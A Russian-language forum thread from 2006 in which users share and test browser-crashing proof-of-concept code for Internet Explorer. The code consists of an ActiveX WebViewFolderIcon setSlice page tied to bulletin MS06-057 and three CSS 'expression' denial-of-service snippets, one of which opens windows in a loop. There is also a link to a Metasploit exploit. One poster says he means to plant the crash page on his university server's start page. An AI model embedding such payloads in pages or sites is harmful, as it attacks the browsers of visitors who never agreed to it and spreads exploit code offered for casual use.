Cвежий баг IE!
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Cвежий баг IE! - 2006-12-06 14:13:30.796666
|
|
|
-=lebed=-
Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
|
Код - убийца IE6-7 quote:
<html><body><script> // MoBB Demonstration function Demo() { var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); a.setSlice(0x7fffffff, 0, 0x41424344, 0); } </script> Clicking the button below may crash your browser!<br><br> <input type='button' onClick='Demo()' value='Start Demo!'> </body></html> Проверить своего осла на багу онлайн! http://www.microsoft.com/technet/security/bulletin/MS06-057.mspx - линк на билютень уязвимости мелкомягких…заплатки там. http://metasploit.com/projects/Framework/exploits.html#ie_webview_setslice - рабочий сплоит, использующий эту багу
|
|
|
RE: Cвежий баг IE! - 2006-12-06 16:03:36.843333
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Свежайший! Аж от 10 Октября! Практически 0day! Молодец, птичка!
|
|
|
RE: Cвежий баг IE! - 2006-12-06 17:59:22.156666
|
|
|
-=lebed=-
Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
|
quote:
ORIGINAL: Pupkin-Zade Свежайший! Аж от 10 Октября! Практически 0day! Молодец, птичка! Ну всё относительно…;) Для ламеров он и через полгода будет свежим, так как дырку они не закроют…
|
|
|
RE: Cвежий баг IE! - 2006-12-06 18:26:51.810000
|
|
|
Technologist
Сообщений: 3590
Оценки: 0
Присоединился: 2006-10-28 20:28:06.943333
|
Аццко, мне нортоновский фаервол кричит, что я сам себя атакую [sm=zhaba.gif]
|
|
|
RE: Cвежий баг IE! - 2006-12-06 18:40:50.750000
|
|
|
devi_29
Сообщений: 133
Оценки: 0
Присоединился: 2006-11-26 16:51:24.136666
|
Осёл сразу загнулся :) :D - надо будет на старовую станичку сервера у нас в университете забацать :)
|
|
|
RE: Cвежий баг IE! - 2006-12-06 18:47:56.483333
|
|
|
Technologist
Сообщений: 3590
Оценки: 0
Присоединился: 2006-10-28 20:28:06.943333
|
Мозилла [sm=em121.gif]. А IE [sm=scull.gif]
|
|
|
RE: Cвежий баг IE! - 2006-12-06 18:50:52.750000
|
|
|
illich
Сообщений: 342
Оценки: 0
Присоединился: 2004-12-14 21:34:35
|
Ну не знаю, специально для этого запустил свой IE неизвестной сборки, так обычно пользуюсь им редко и на проверенных ресурсах, посему и не обновляю. И по барабану ему ентот тест, всё в порядке.
|
|
|
RE: Cвежий баг IE! - 2006-12-06 19:09:43.453333
|
|
|
Sma11erM1nd
Сообщений: 123
Оценки: 0
Присоединился: 2006-06-10 03:56:35
|
Сначала ослик выдал ошибку, потом докторВатсон, которого я после переустановки забыл убить, так вот заоодно и убил… ПОра уже всем переходить на ОгненнуюЛису!
|
|
|
RE: Cвежий баг IE! - 2006-12-07 11:24:46.126666
|
|
|
-=lebed=-
Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
|
Ну вот вам уж точно свежачки! Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) Автор: José Carlos Nieto Jarquín Дата: Ср. 6 Дек. 2006 11:01 Tested under Windows XP SP2, MSIE 6.0.2900.2180 Exploit 1 <div id="foo" style="height: 20px; border: 1px solid blue"> <table style="border: 1px solid red; width: expression(document.getElementById('foo').offsetWidth+'px');"> <tr><td></td></tr> </table> </div> Exploit 2 <div style="width: expression(window.open(self.location));"> </div> Exploit 3 <html> <head> <title>Another non-standards compliant IE D.O.S.</title> </head> <body> <div id="foo" style="height: 20px; border: 1px solid blue"> <table style="border: 1px solid red; width: expression(parseInt(window.open(self.location))+document.getElementById('foo').offsetWidth+'px');"> <tr> <td> IE makes my life harder :(. It sucks, don't use it :). </td> </tr> </table> </div> Written by <a href="http://xiam.be">xiam</a>.<br /> Tested under IE 6.0.2900.2180 </body> </html> Тестите на здоровье!
|
|
|
RE: Cвежий баг IE! - 2006-12-07 16:39:15.546666
|
|
|
Ded MustD!e
Сообщений: 567
Оценки: 0
Присоединился: 2006-07-23 17:19:08
|
Первый эксплойт повесил осла(снял задачу через диспетчер), второй и третий открыли несколько левых окошек, но при свободном закрытии главного первого окна все убиралось => 1-норм; 2 и 3 - хуйня.
|
|
|
RE: Cвежий баг IE! - 2006-12-27 16:49:28.760000
|
|
|
ARIY
Сообщений: 41
Оценки: 0
Присоединился: 2006-11-28 22:33:45.326666
|
Ну и че? Первый раз за последний год запустил осла. Зашел на пагу и нифига-живой гад.
|
|
|
RE: Cвежий баг IE! - 2006-12-27 19:57:19.223333
|
|
|
]SAPER[
Сообщений: 357
Оценки: 0
Присоединился: 2006-08-30 14:34:48
|
quote:
ORIGINAL: ARIY Ну и че? Первый раз за последний год запустил осла. Зашел на пагу и нифига-живой гад. а ты не думал что винда сама на него заплатки скачала и нах этот топик было наверх поднимать???:@
|
|
|
|
|